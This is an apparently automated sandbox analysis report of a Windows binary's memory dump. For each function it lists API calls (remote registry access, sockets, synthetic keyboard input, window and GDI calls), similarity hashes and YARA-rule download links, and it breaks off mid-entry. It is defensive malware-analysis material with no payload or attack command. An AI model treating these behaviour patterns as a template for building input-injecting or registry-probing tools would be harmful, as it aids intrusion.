          Uniqueness Score: -1.00%

          Function 011652D0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
          Download Yara Rule
          APIs
          • SafeArrayAccessData.OLEAUT32(?,?), ref: 011652F4
          • VariantClear.OLEAUT32(?), ref: 0116532E
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0116534E
          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01165381
          • VariantClear.OLEAUT32(?), ref: 011653C1
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 01165404
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
          • String ID: crts
          • API String ID: 586820018-3724388283
          • Opcode ID: fe0dd9a47d08659ba189eec8971ed8720a14f9503399b564b2daff8bd00eb013
          • Instruction ID: 484ed8f175350b3675785c3ecd5b59fd831bd355e872a96552318ba01b628509
          • Opcode Fuzzy Hash: fe0dd9a47d08659ba189eec8971ed8720a14f9503399b564b2daff8bd00eb013
          • Instruction Fuzzy Hash: 55416CB5200208DBDB24CF19D4C0A9AB7B9FF9C354F24812AEA598B355E735E951CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117B415, Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
          Download Yara Rule
          APIs
          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0117B433
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0117B466
          • EnterCriticalSection.KERNEL32(?), ref: 0117B483
          • _memmove.LIBCMT ref: 0117B4E1
          • _memmove.LIBCMT ref: 0117B504
          • LeaveCriticalSection.KERNEL32(?), ref: 0117B513
          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0117B52F
          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0117B544
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
          • String ID:
          • API String ID: 2737351978-0
          • Opcode ID: 6989954bf23b0c99cebbabdedc2cb63a1490b2b7774a5e663014bac45ad652fc
          • Instruction ID: 8046f4933d0bb2514a15bfd1efc11d69da6818fa070af75a673f4b162d6b0ebb
          • Opcode Fuzzy Hash: 6989954bf23b0c99cebbabdedc2cb63a1490b2b7774a5e663014bac45ad652fc
          • Instruction Fuzzy Hash: 73416A71A00209EFDB24DF55D884EAFB7B8FF48700F108969E56696640D770FA84DB64
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01145134, Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
          Download Yara Rule
          APIs
          • ___set_flsgetvalue.LIBCMT ref: 0114515A
          • __calloc_crt.LIBCMT ref: 01145166
          • __getptd.LIBCMT ref: 01145173
          • CreateThread.KERNEL32 ref: 0114519A
          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 011451AA
          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 011451B5
          • _free.LIBCMT ref: 011451BE
          • __dosmaperr.LIBCMT ref: 011451C9
            • Part of subcall function 01147E9A: __getptd_noexit.LIBCMT ref: 01147E9A
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
          • String ID:
          • API String ID: 3638380555-0
          • Opcode ID: 83aa95fcbdcc32e46970c963e13531554ec05c428c2930615f8227d2fda2538b
          • Instruction ID: f6b3d4a52f703cfd7da6438fa2bdf178babaffacb24a181ce87170709f390800
          • Opcode Fuzzy Hash: 83aa95fcbdcc32e46970c963e13531554ec05c428c2930615f8227d2fda2538b
          • Instruction Fuzzy Hash: 1B1148361017126BD72D3BB99C44A5B3B56EF85F38F210619FA28572C1DBB098058661
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011950C6, Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
          Download Yara Rule
          APIs
          • WSAStartup.WSOCK32(00000101,?), ref: 01195196
            • Part of subcall function 0118875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,01196CC2,?,011A3B72,011A3B72,?), ref: 0118877B
          • inet_addr.WSOCK32(?,00000000,?,?), ref: 011951D8
          • gethostbyname.WSOCK32(?), ref: 011951E3
          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 01195259
          • _memmove.LIBCMT ref: 01195307
          • GlobalFree.KERNEL32 ref: 01195399
          • WSACleanup.WSOCK32 ref: 0119539F
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
          • String ID:
          • API String ID: 2945290962-0
          • Opcode ID: 71d9bf38c6ce6806fdae334cfdc7d6ff72688e294a8af7f2c8d5f791aa90707a
          • Instruction ID: fbdf14c72e3f9eadc0cd2a2237f6ebfe546fdba2e5945a9f0bfc8a0e77f7d597
          • Opcode Fuzzy Hash: 71d9bf38c6ce6806fdae334cfdc7d6ff72688e294a8af7f2c8d5f791aa90707a
          • Instruction Fuzzy Hash: 4DA19FB2208311AFD758EF64CC80F6AB7E9BF98714F14891DF655A7280D771E904CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117045D, Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
          Download Yara Rule
          APIs
          • GetSystemMetrics.USER32 ref: 0117049C
          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 011706D8
          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 011706F7
          • InvalidateRect.USER32(?,00000000,00000001), ref: 0117071A
          • SendMessageW.USER32(?,00000469,?,00000000), ref: 0117074F
          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 01170772
          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0117078C
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
          • String ID:
          • API String ID: 1457242333-0
          • Opcode ID: 1368ab5f8d534d0cf654bea75bed840494f31dd4b4c461e5a07978754a552eb3
          • Instruction ID: 1a2eb422c8be5430eba3f9913d5798f4db6ec3eb9fed46c6226d7cef54810552
          • Opcode Fuzzy Hash: 1368ab5f8d534d0cf654bea75bed840494f31dd4b4c461e5a07978754a552eb3
          • Instruction Fuzzy Hash: 50B16B7460070ADBDB28CF68C984BAEBBF1FF89311F148519F99597285D734AA80CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01177273, Relevance: 10.7, APIs: 7, Instructions: 210COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011770BF: DeleteObject.GDI32(00000000), ref: 011770FC
            • Part of subcall function 011770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0117713C
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117714C
            • Part of subcall function 011770BF: BeginPath.GDI32(?), ref: 01177161
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117718A
          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 011773E8
          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 011773F8
          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 01177433
          • LineTo.GDI32(?,?,FFFFFFFE), ref: 0117743C
          • CloseFigure.GDI32(?), ref: 01177443
          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 01177452
          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0117746E
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
          • String ID:
          • API String ID: 4082120231-0
          • Opcode ID: 361bdc232325f5b81a203d25c93c5a49b24d7da00a39dbf63724a77eb5c14687
          • Instruction ID: 8971813bebab3bb9fc0a6a465e976cc90187403913c262af0c89955f7da7a2ae
          • Opcode Fuzzy Hash: 361bdc232325f5b81a203d25c93c5a49b24d7da00a39dbf63724a77eb5c14687
          • Instruction Fuzzy Hash: A27141B5900109EFDB08DF98C888EBEBBB9FF89314F158159E95567381C734AE41CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119A3F6, Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0119A51C
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0119A548
          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0119A573
          • RegEnumValueW.ADVAPI32 ref: 0119A5A6
          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0119A5CF
          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0119A608
          • RegCloseKey.ADVAPI32(?), ref: 0119A613
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
          • String ID:
          • API String ID: 2027346449-0
          • Opcode ID: 1a35b17f9a98d9a4411f3fe4315a439521d8a60327482472808df17fa7c45e69
          • Instruction ID: df8ec898c5edeebcb1ac5c65f98c4874978f93d1ba33f9f5c3dd2b3ce34ec60c
          • Opcode Fuzzy Hash: 1a35b17f9a98d9a4411f3fe4315a439521d8a60327482472808df17fa7c45e69
          • Instruction Fuzzy Hash: A8614F71618302AFD708EF64D884E6BB7E9BFD8708F04891CF55587284DB75E908CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119C3A9, Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
          Download Yara Rule
          APIs
          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0119C54C
          • WSAGetLastError.WSOCK32(00000000), ref: 0119C55D
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLastselect
          • String ID:
          • API String ID: 215497628-0
          • Opcode ID: b37db1928ce3af5591b683a0623c6bdd70b3b30f722919d48cb656cfedf66b94
          • Instruction ID: 5172275a5d3e57c4bc04ca4fb0c95074166b1759d8861a49a6de6216850cd37a
          • Opcode Fuzzy Hash: b37db1928ce3af5591b683a0623c6bdd70b3b30f722919d48cb656cfedf66b94
          • Instruction Fuzzy Hash: 87512D72B00104ABDB18EF68DC84FAE77A8EB98724F148159F925D7280DB30ED04C7A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011742E1, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
          Download Yara Rule
          APIs
          • GetParent.USER32(?), ref: 01174320
          • GetKeyboardState.USER32(?), ref: 01174335
          • SetKeyboardState.USER32(?), ref: 01174389
          • PostMessageW.USER32(?,00000101,00000010,?), ref: 011743B9
          • PostMessageW.USER32(?,00000101,00000011,?), ref: 011743DA
          • PostMessageW.USER32(?,00000101,00000012,?), ref: 01174426
          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0117444B
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessagePost$KeyboardState$Parent
          • String ID:
          • API String ID: 87235514-0
          • Opcode ID: 92cdbeeca9bce0a9247e994e14b19290ddb8a679aa9d7ea2e9e6a3e110c00707
          • Instruction ID: bf4894b2402eea006eee6cd37edbb55b3f4103b9d207263df93a1f74031c9ace
          • Opcode Fuzzy Hash: 92cdbeeca9bce0a9247e994e14b19290ddb8a679aa9d7ea2e9e6a3e110c00707
          • Instruction Fuzzy Hash: 3E510BA0508BE139F73A827C8845BB6BFB85F06704F088689E1DA559C3D3A8A594D761
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011744D9, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
          Download Yara Rule
          APIs
          • GetParent.USER32(?), ref: 01174518
          • GetKeyboardState.USER32(?), ref: 0117452D
          • SetKeyboardState.USER32(?), ref: 01174581
          • PostMessageW.USER32(?,00000100,00000010,?), ref: 011745AE
          • PostMessageW.USER32(?,00000100,00000011,?), ref: 011745CC
          • PostMessageW.USER32(?,00000100,00000012,?), ref: 01174615
          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 01174637
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessagePost$KeyboardState$Parent
          • String ID:
          • API String ID: 87235514-0
          • Opcode ID: 47eb53eb4ae05f200bc2ab9d12cfdef2a4016cebccf67fc9982aa0caca0200c2
          • Instruction ID: 32a32903bb8ac53c9be4300f90b88982065fc8bd8347dd13d9c8bf92fb3533cc
          • Opcode Fuzzy Hash: 47eb53eb4ae05f200bc2ab9d12cfdef2a4016cebccf67fc9982aa0caca0200c2
          • Instruction Fuzzy Hash: 9E51F6A05087D139F73A927C8C45BB6BFB96F06700F088689F2D516EC2D3A8F594D7A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011852F4, Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(?,00001308,?,00000000), ref: 01185314
          • ImageList_Remove.COMCTL32(?,?), ref: 01185348
          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 01185430
          • DeleteObject.GDI32(?), ref: 011856AB
          • DeleteObject.GDI32(?), ref: 011856B9
          • DestroyIcon.USER32(?), ref: 011856C7
          • DestroyWindow.USER32(?), ref: 011856D5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
          • String ID:
          • API String ID: 2354583917-0
          • Opcode ID: 99b36e872cbaab1553e4a79198c748950e1fb9e145284248dc8d46ce68005380
          • Instruction ID: c7f6a43f4e655cb866a5e31059f6dc3a77066200e2bbdaf8cd8f567dc5e36ec5
          • Opcode Fuzzy Hash: 99b36e872cbaab1553e4a79198c748950e1fb9e145284248dc8d46ce68005380
          • Instruction Fuzzy Hash: 5D519E342046419FC769EF28C4D4BA6BBE6FF49301F54C6A8F995CB291D730A845CF61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011854A6, Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
          • String ID:
          • API String ID: 3985565216-0
          • Opcode ID: 9ccfcb7f02a099f8d5b0ef5e871ed0de6e48237cb527eb518332714bcec84779
          • Instruction ID: 98fe54c91ae11138a1c186761fa4f2d970871993756ff2953167691aeae6b08e
          • Opcode Fuzzy Hash: 9ccfcb7f02a099f8d5b0ef5e871ed0de6e48237cb527eb518332714bcec84779
          • Instruction Fuzzy Hash: 53215C703006019FDB69EF28D5C8A1A7BABFF44315F10C968E956CB245DB35E881CF61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011601F8, Relevance: 9.3, APIs: 6, Instructions: 255COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Rect$Client$Window$MetricsScreenSystem
          • String ID:
          • API String ID: 3220332590-0
          • Opcode ID: 344d0a6433179f59eb2aa472537711db287945e7ad91b68ad05e66826b4b37b1
          • Instruction ID: 0b7ea4d1421af132556a98a6f33d166d269f97320bb3ab1ada9e1ecf01dce9a1
          • Opcode Fuzzy Hash: 344d0a6433179f59eb2aa472537711db287945e7ad91b68ad05e66826b4b37b1
          • Instruction Fuzzy Hash: 2EA14875A0070A9BDB28CFACC5847EEBBB5FF58314F00852DE9A9D7250E731A964CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117F149, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove_strncmp
          • String ID: >$U$\
          • API String ID: 2666721431-237099441
          • Opcode ID: 4a64db9f5e2681eeb5e0eaf7a02fbcf6dc098e05cdc95ae0bd214a8af764ff2c
          • Instruction ID: c5e2488cb3337ff851f3945f43c5647af2e57ba4201c5be2e73d4cd3138133d3
          • Opcode Fuzzy Hash: 4a64db9f5e2681eeb5e0eaf7a02fbcf6dc098e05cdc95ae0bd214a8af764ff2c
          • Instruction Fuzzy Hash: 7BF18270A0024ACFDB19CF69C8906BEBBF1FF89314F24856ED86697345D730A942CB61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117C48A, Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
          Download Yara Rule
          APIs
          • GetKeyboardState.USER32(?), ref: 0117C4E6
          • SetKeyboardState.USER32(00000080), ref: 0117C50A
          • PostMessageW.USER32(?,00000100,?,?), ref: 0117C54B
          • PostMessageW.USER32(?,00000104,?,?), ref: 0117C583
          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0117C5A5
          • SendInput.USER32(00000001,?,0000001C), ref: 0117C638
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessagePost$KeyboardState$InputSend
          • String ID:
          • API String ID: 2221674350-0
          • Opcode ID: b43e4643b0e0f11ed12000dbb39bfb57226571d1198f2c2fb380e8ce17a2022a
          • Instruction ID: 3f2b2091ebb9761bb71ea0060fa9f758b55f1693c187060536a77ef05c6c3684
          • Opcode Fuzzy Hash: b43e4643b0e0f11ed12000dbb39bfb57226571d1198f2c2fb380e8ce17a2022a
          • Instruction Fuzzy Hash: 92516BB26002196ADB18EFA8D8C4BFE7B7CAF99710F004156FD9496242C336D555C7E1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118558B, Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DestroyWindow$DeleteObject$IconMove
          • String ID:
          • API String ID: 1640429340-0
          • Opcode ID: b3dfb344ef85c82a44fd1b0145c1bf534bb756a6f9819135e1ef7596a57ed5a4
          • Instruction ID: 40a2145639a14cd2d73527be4589ed4b5a915b3733a4d1499e0aad8f1c5a6cf8
          • Opcode Fuzzy Hash: b3dfb344ef85c82a44fd1b0145c1bf534bb756a6f9819135e1ef7596a57ed5a4
          • Instruction Fuzzy Hash: 523145742006019FDB69EF28D8C8B2677FAFB48301F148AA8EA55CB255D734E885CF61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011850DD, Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
